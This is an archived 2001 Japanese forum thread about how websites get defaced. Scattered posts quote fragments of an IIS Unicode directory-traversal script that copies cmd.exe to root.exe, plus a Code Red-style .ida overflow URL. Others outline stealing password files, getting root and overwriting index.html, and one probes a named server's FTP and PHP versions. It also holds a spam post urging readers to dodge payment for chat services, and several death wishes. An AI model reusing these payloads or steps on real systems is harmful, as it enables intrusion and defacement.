●Webページの改ざんって?技術を教えて。●

このエントリーをはてなブックマークに追加
1POPPY
よくホームページが書き換えられて問題になりますが
技術がどういうことか教えてね。
2POPPY:2001/07/03(火) 21:04
age
3名無しさん@お腹いっぱい。:2001/07/03(火) 21:04
だいたいIIS

終了
4POPPY:2001/07/03(火) 21:09
IISってなあに?
5名無しさん@お腹いっぱい。:2001/07/03(火) 21:12
Ichi ha ItteyoShi
6 :2001/07/03(火) 21:13
I=インポチン
I=インポチン
S=氏ね
7お前アホか?:2001/07/03(火) 22:22
Internet Information Server
8名無しさん@お腹いっぱい。:2001/07/03(火) 22:35
>>1
正解。よくわかったね。
9 :2001/07/04(水) 12:03
ここにいる連中にはわからんよ
10名無しさん@お腹いっぱい。:2001/07/04(水) 12:36
>>9
おいおい1、教えてもらいたくて必死だな
頼むからageないでね
11名無しさん@お腹いっぱい。:2001/07/04(水) 12:47
1は自分でやってみたいだけの厨房なので、
実際のテクニックを教えてあげる人はいませんよ。


終了
12名無しさん@お腹いっぱい。:2001/07/04(水) 14:10
>>1
ローカル鯖をツクレ!!ドメインはハクしたいドメインをツクレ!!
DNS(ローカル用)ツクレ!!HTTPDタテロ!!ハクしたいWEBページを
根こそぎヒッパレ!!DNSにハクしたいAとPTRをアテロ!!ヨシ!!
オモウゾンブン!!改ざんシロ!!トモダチよんで思う存分自慢シロ!!
13名無しさん@お腹いっぱい。:2001/07/04(水) 14:12
トモダチイマセン
14名無しさん@お腹いっぱい。:2001/07/04(水) 14:35
ボクガミニイクヨ.
15名無し:2001/07/04(水) 16:14
バッファオーバーフローでgoogle検索してみそ
16名無しさん@お腹いっぱい。:2001/07/04(水) 17:21
>>1
ftpでHTMLファイルを転送するんだよ。
17名無しさん:2001/07/04(水) 19:05
1827:2001/07/05(木) 01:02
#!/usr/bin/perl

use Socket;
# --------------init
if ($#ARGV<0) {die "UNICODE-HACK-PROGRAM

Example: c:\\perl uni.pl www.theriver.com:80 {OR}
c:\\perl uni.pl 127.0.0.1:80\n";}
($host,$port)=split(/:/,@ARGV[0]);
print "Trying $host.....................\n";
$target = inet_aton($host);
$flag=0;

# ---------------test IF IIS
my @results=sendraw("GET x HTTP/1.0\r\n\r\n");
foreach $line (@results)
{
if ($line =~ /Server: Microsoft-IIS/)
{
1927:2001/07/05(木) 01:04
sendraw("GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+copy+\\winnt\\system32\\cmd.exe+root.exe HTTP/1.0\r\n\r\n");
20名無しさん@お腹いっぱい。:2001/07/05(木) 01:18
バッファオーバーフローで書き換えてんの?
それともバックドアをバッファオーバーフローで仕掛けるって事か?
2127:2001/07/05(木) 01:19
UNICODE-HACK-PROGRAM
22名無しさん@お腹いっぱい。:2001/07/05(木) 01:21
>>20
バッファオーバーフローで検索しなおせ
23名無しさん@お腹いっぱい。:2001/07/05(木) 01:25
>>22
バッファオーバーフローは知ってるよ。
ただあふれた部分でhtml直接書き換えてんのかトロイしこんでんのか聞いてるだけだろ
2422:2001/07/05(木) 01:33
>>23
わかってないじゃないか(´_ゝ`)
どこがあふれてるんだ?

http://shadowpenguin.backsection.net/documents/unix-overflow/UNIX%20Overflow.htm

ZDNetあたりにもっと詳しい説明がしてあるページがあったから自分で探せ
25名無し@お腹いっぱい:2001/07/05(木) 01:35
>ただあふれた部分でhtml直接書き換えてんのか
とてもバッファオーバーフローを知ってるとは思えない(藁
26名無しさん@お腹いっぱい。:2001/07/05(木) 01:38
>>24
バッファオーバーフローってそもそも名前の通りバッファからあふれるような
データを送りつけてバッファからあふれた分のデータが書き換えられるって仕組みだろ?
と思ったんだけど、root権限を乗っ取るのが一般的なのか。
とりあえずありがとう。
27名無しさん@お腹いっぱい。:2001/07/05(木) 04:18
guest guest
28名無しさん@お腹いっぱい:2001/07/05(木) 09:56
概念は簡単過ぎるほど簡単、様はチェックされてない所に長いデータ
送るだけだからね、でもそこでハッキングコード実行させるとなると
話は180度変わってきます。
スタックの積まれ方やエンディアンを意識した相当高度なPG技術が必要
です。俺はRETアドレスの上書きまでで挫折してしまった・・・・・
focusとか見てると凄いのが転がってるけど、思うにこの辺がちょっと
やりすぎなのかな、とか感じてるよ、最近。
やっぱり作ったものは公開したくなるのかな、あのレベルの人でも・・・
29名無しさん@お腹いっぱい。:2001/07/05(木) 10:02
まあ公開しないと穴空きっぱなしだし
公開も悪いことじゃないよ。まあ悪用する
ハゲはどうにもなんねーけど
30名無しさん@お腹いっぱい。:2001/07/15(日) 02:32
c使えんの前提か・・・はぁ。
31名無しさん@お腹いっぱい。:2001/07/15(日) 18:51
>>30 c使えんの前提か・・・はぁ。
ではない。
アセンブラを使えるというのが大前提。
翻えって、マシン語そのものを打ち込む必要もあり。
さらには、サーバが使っているであろうC言語のマシン語レベルの
コーリングシーケンスの知識も必要。
32名無しさん@お腹いっぱい。:2001/07/19(木) 05:48
>>31
はWebページ改ざん出来るんですかー?
33>>32:2001/07/19(木) 09:51
その前に Webサーバ動いてないとダメじゃないの?
34名無しさん@お腹いっぱい。:2001/07/19(木) 17:37
っていうか、まずどうやるのかすら全く予想もつかないんですけど。。。
相手のパソコンに侵入するんですか?マジでわからん。侵入するにも
このパソコンからどうやって侵入出来るんだろう。。。
351:2001/07/19(木) 17:55
趣味でバイオレス小説書いてます。
あれこれバイオレンスなシーンを考えるのが好きです。
で、いろいろ計画を立ててみました。拉致する
対象の行動のクセとか調べたり、拉致しておく
貸し別荘を匿名で借りたり。小道具など色々
そろえてみたり。
もちろん、計画するだけです。
実際にやっちゃったら犯罪だし、
完璧に計画たてても運悪くつかまったりする
かもしれないし。
36名無しさん@お腹いっぱい。:2001/07/19(木) 18:00
小さな隙間から
ちゅるちゅると入っていきます
37名無しさん:2001/07/19(木) 21:20
一連のIISの書き換えって
BoFなんてチトーモつかってないよ
ヴァカバッカ
単なるバグついただけだろが
38名無しさん@お腹いっぱい。:2001/07/19(木) 21:26
まぁ落ち着け。BOFって騒いでいるのは1だけだろ。
39jl;:2001/07/20(金) 00:03
/etc/passwd
もってきて、rootのパスを手に入れる。
ftpでログインしてindex.html書き換える。

shadowかかっていたら1の場合はあきらめろ。
クソ管理でshadowファイルのパーミッションが甘かったらまだいける。
40名無しさん@お腹いっぱい。:2001/07/20(金) 00:53
恐ろしく特殊な環境が前提なんだね(w
41なにがさ?:2001/07/20(金) 05:46
特殊だろうがなんだろうが、一連の手順を自動化させとけばいいだけじゃ。まさかプチプチ手作業想像してない?
42名無しさん@お腹いっぱい。:2001/07/20(金) 08:04
>/etc/passwd
>もってきて
いや・・・そこまでの過程を教えて頂けたらありがたいんですけど。
43名無しさん@お腹いっぱい。:2001/07/20(金) 09:44
42はアタマ悪いの?首吊って死んでね。
44名無しさん:2001/07/20(金) 10:10
>>43
わかってる人間だから、>>42な聞き方だと思ってるのは
漏れだけか?(藁
それがわかってない >>43 逝ってよしと思ってるのも
漏れだけか?(藁
45名無しさん@お腹いっぱい。:2001/07/20(金) 14:50
説明するとなると出来ない、赤面性かもね。
辛抱強い42
46名無しさん@お腹いっぱい。:2001/07/20(金) 19:41
>>26

IISに効くらしい、InternetExplorerでアクセスするんだったら本望だろう(藁

http://www.microsoft.com/default.ida?NNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090
%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090
%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a
47名無しさん@お腹いっぱい。:2001/07/20(金) 21:21
>>41
・・・・・・・・・・・・いや、いいよ。それなら何も言うまい。
48fuck ***.ne.jp:2001/07/21(土) 02:10
うちのプロバイダport23あいてるうえに、シャドウウイング処理してなかったよ。
バカ丸出しだ。
smtpでexpn、vrfyで本名参照できるし。本当にバカ丸出しだ。

調べてみたら高校卒業したばかりの19歳の少年が経営している地方プロバイダだった。
もうちょっと勉強してからやれよ。
49名無しさん@お腹いっぱい。:2001/07/21(土) 02:12
ゲッ、まだそんなところが・・・最低だな
50名無しさん@お腹いっぱい。:2001/07/21(土) 08:52
>>43
あんた天然?首吊って死ぬのはあんただよ。
そこからは厨房でも分かるよ。あなた何の事について話してるのかすら分かってないようですね。
一人だけ外れてるよ。まあ、厨房は放置しておきましょう。

>>44
あなただけというのではなく、>>43が何もわかってないだけだと思います。
アホは放置しましょう。相手にするとつけ上がります。
51名無しさん@お腹いっぱい。:2001/07/21(土) 09:22
ハクしました。
本当のことに書き換えたぞ。
h++p://www6.ocn.ne.jp/~channel2/about_ocn.html
52名無しさん@お腹いっぱい。:2001/07/21(土) 13:07
50は一人で怒ってるけどさ。
やめときなよ、ハックなんて(ワラ
53:2001/07/21(土) 17:29
日本語おかしいよ(ゲラゲラ
流石みんなから放置されるだけの事はあるね(ゲラゲラ
54名無しさん@お腹いっぱい。:2001/07/26(木) 03:31
55名無しさん@お腹いっぱい。:2001/07/29(日) 12:41
>>1
リモートバッファーオーバーフローさせてスーパーユーザー権限を取得する。
もしシェルを使えるのならtelnetでログインしてexploitコードを
コンパイルして走らせてスーパーユーザーになってください。
exploitコードは検索すればそこらじゅうから出てきます。
httpd.confでも見てwwwのドキュメントルートになってるディレクトリに
移動して別途に用意したindex.htmlをアップロードしておけばいいです。
概念的にはこんなかんじですが、実際やるのは面倒です。
人様に迷惑がかからないように、ローカルホストで遊んでください。
56名無しさん@お腹いっぱい。:2001/07/29(日) 19:15
55さんはハッカーですか??
5755:2001/07/29(日) 19:18
いいえ、所謂へたれです。
58 :2001/07/29(日) 20:54
59名無しさん@お腹いっぱい。:2001/07/29(日) 20:58
/etc/passwdと書いてありますが、はてさて???
どうせなら/etc/shadowを取ってきましょう???
60名無しさん@お腹いっぱい。:2001/07/29(日) 21:00
っつっても、モロcounterfeitっぽいけど
6158:2001/07/29(日) 21:18
>>60
やっぱりそうかな?
62名無しさん@お腹いっぱい。:2001/07/30(月) 01:35
改ざんされているところって、ftp ftp-dataとかのポートは最初から空いてるの?
63名無しさん@お腹いっぱい。:2001/07/30(月) 01:49
犯罪厨房発見!
64sage:2001/07/30(月) 16:52
うちの会社一千万出してWEBサーバ立てたのにanonyで入れるようになってたわ。
入れるどころか書き換えも出来てたわ。
素敵。
65fffryyyyuu:2001/07/30(月) 19:13

危険なCGIがいっぱい

http://000.zive.net
(危険保管庫)
66ま゛:2001/07/30(月) 21:08
>>65
ブラクラ
67名無しさん@お腹いっぱい。:2001/07/31(火) 00:53
>>64
普通anonymousログイン以前に、ポート20,21,23は塞がないか。
やったのはどこの会社?
68名無しさん@お腹いっぱい。:2001/07/31(火) 01:43
>>67
>>64は、ブラフに決まってンだろ。
69nana-C:2001/07/31(火) 06:13
>>68
差別されている地域?
70名無しさん@お腹いっぱい。:2001/07/31(火) 08:30
>67
E-マネージメントとかいう会社
ポートがふさがってないのはファイルの更新をFTPでするため。
71りゅりゅ:2001/08/01(水) 19:28
ども。はじめまして♪
テレホンレディー(テレクラ、ツーショットのサクラ)をしてるりゅりゅといいます。

みなさんにいいこと教えてあげます。
このお仕事、友達が登録すると1人につき8千円〜1万円の紹介料がもらえます。
そんで男の人は料金後払いだと10分〜60分の無料体験サービスがあります。

そ・こ・で・提案♪
女の子は登録だけしてくれるだけでいいので私たちと紹介料を半分ずつにして
男の人は無料分だけかけたり、公衆電話からかけまくって、私たちの時給を半分ずつにしません?
そうそ、男の人は無料分を数千円オーバーしても追加料金なんか払うことないです。
何回か督促のTELがかかってきますけど、そんなの放っといて大丈夫です。
数千円で何度も督促してたら会社が費用倒れになっちゃいますからあきらめてくれます(笑)

あと、りゅりゅは、ネットレディー(出会いサイトのメールやチャットのサクラ)も募集してます。
こっちは、こういうとこに書くと危険なので、りゅりゅが講師(笑)でチャット説明会を開いてます♪

さぁて、嫌がらせ・文句のメールやBBSへのカキコは放置プレイにします。
いっときますけど、私も彼もパソコンにめっちゃ強いので、荒らし君はとっちめてあげます♪
タグ攻撃しかできないような人はやめておいた方がいいと思いますよ(笑)

↓からあなたの地域の人を探して連絡とってね♪ Last update 2001.07.08


りゅりゅのサイト。 ギブ&テイク精神のない人はお断り!!
http://www6.plala.or.jp/Knock-off/

http://www.geocities.co.jp/PowderRoom-Rose/9498/
http://www5.ocn.ne.jp/~koisaku/text/tel/act0.html
http://www25.freeweb.ne.jp/feminine/luvaqua/
http://www.hello.co.jp/~nana77/
http://www.geocities.co.jp/PowderRoom-Tulip/2142/
http://www.geocities.co.jp/PowderRoom-Rose/5097/
http://www.asahi-net.or.jp/~vj6m-krhs/telele/
http://www35.tok2.com/home/MAYUKO/top.htm
http://www30.freeweb.ne.jp/feminine/saya327/
http://www.geocities.co.jp/PowderRoom/6276/
http://fry.to/mayupal/
http://dreamcity.gaiax.com/home/chocopie
http://www.geocities.co.jp/PowderRoom/8338/
http://www.geocities.co.jp/Bookend-Soseki/1164/index.html
http://www2.to/fps/
http://www.geocities.com/Nashville/Rodeo/6893/
http://village.infoweb.ne.jp/~love/yumi/index.htm
http://www11.freeweb.ne.jp/novel/yueni/
72名無しさん@お腹いっぱい。:2001/08/01(水) 19:33
>私も彼もパソコンにめっちゃ強いので
すげぇ。exploitください。
73名無しさん@お腹いっぱい。:2001/08/01(水) 21:23
ふ〜ん、パソコンに強いんだ(w
WORDとEXCELのスペシャリストかな。怖い怖い
74名無し:2001/08/01(水) 23:35
>>71

www6.plala.or.jpは外部FTPポートが空いていたけど
proftp1.2.1だった。さすがにplalaだけあって
セキュリティが高いのか?

しかしBBSのサーバがapache1.3.14+php3だから
php関係で攻めれそうだな
75 :2001/08/01(水) 23:40
>>73
Outlook Expressだと思われ
76_____________________:2001/08/01(水) 23:50
>>71
71は74の内容を理解したのかな?
パソコンに強いんじゃ無理か(藁
^^^^^^^
77名無しさん@お腹いっぱい。:2001/08/02(木) 00:24
>>72−76
こんな荒らし依頼ミエミエの書き込み、鵜呑みにすんなよ・・・
7867:2001/08/02(木) 01:25
>>70
サンキューです。
そういえは、私の勤め先は3月にWeb書き換えられて新聞記事になりました。
79名無しさん@お腹いっぱい。:2001/08/02(木) 20:08
三菱かな?
80名無しさん@お腹いっぱい。:2001/08/02(木) 22:17
71のリンク先はともかく
71本人はその程度の知識を持ってるのかと思ったんだが、違うのか(藁
81名無しさん@お腹いっぱい。:2001/08/03(金) 01:50
ホラ、これ読めや。
http://k-pup.sunaba.net/~morioka/mi019jp.htm
82:2001/08/03(金) 01:56
telnetってなあに?
83名無しさん@お腹いっぱい。:2001/08/03(金) 02:00
telnet は telnet だぎゃあ。
みんな知ってる、みんな使ってる、楽しい telnet。
ネット猫を好む御仁もおるがのぉ。
84うそぷー:2001/08/03(金) 02:22
うそぷー!
うそぷっぷー!
85おーはし:2001/08/03(金) 02:28
おいお前ら!
このクズども!
少しはGNPに貢献しろ、無駄に息吸って吐くな。
氏ね、氏ね、氏ね、氏ね!
86名無しさん@お腹いっぱい。:2001/08/03(金) 02:35
嘘なんかついちゃおらんぞ。
ネット猫も知らんなら探してみるといい。あれもなかなかいいぞ。
87 :2001/08/09(木) 00:30
>>85
掲示板の趣旨と違う事を書く
のはマズいんじゃないの?
ま、荒らしが目的ならこんな
注意しても意味ないんだけどさ。
困ったもんだね(笑)。
88あげ:2001/08/19(日) 19:03
あげ
89TEST:2001/08/19(日) 19:29
90名無しさん
>>74
proftpd1.2.1なら、セキュリティはざる
1.2.2に入れ替えるようにいうてやれ